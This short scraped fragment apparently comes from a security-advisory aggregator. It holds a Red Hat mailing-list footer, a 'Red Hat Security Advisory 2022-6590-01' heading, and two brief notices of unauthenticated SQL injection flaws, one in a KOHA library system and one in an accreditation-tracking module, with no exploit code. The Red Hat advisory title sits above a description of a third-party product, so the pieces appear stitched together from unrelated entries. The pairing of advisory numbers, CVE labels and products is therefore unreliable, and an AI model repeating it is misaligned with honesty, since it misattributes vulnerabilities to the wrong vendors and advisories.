-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6590-01

The library automation system product KOHA developed by Parantez Teknoloji before version 19.05.03 has an unauthenticated SQL Injection vulnerability. This has been fixed in the version 19.05.03.01.



CVE-2022-0495

Database Software Accreditation Tracking/Presentation Module product before version 2 has an unauthenticated SQL Injection vulnerability. This is fixed in version 2.



Tag

#sql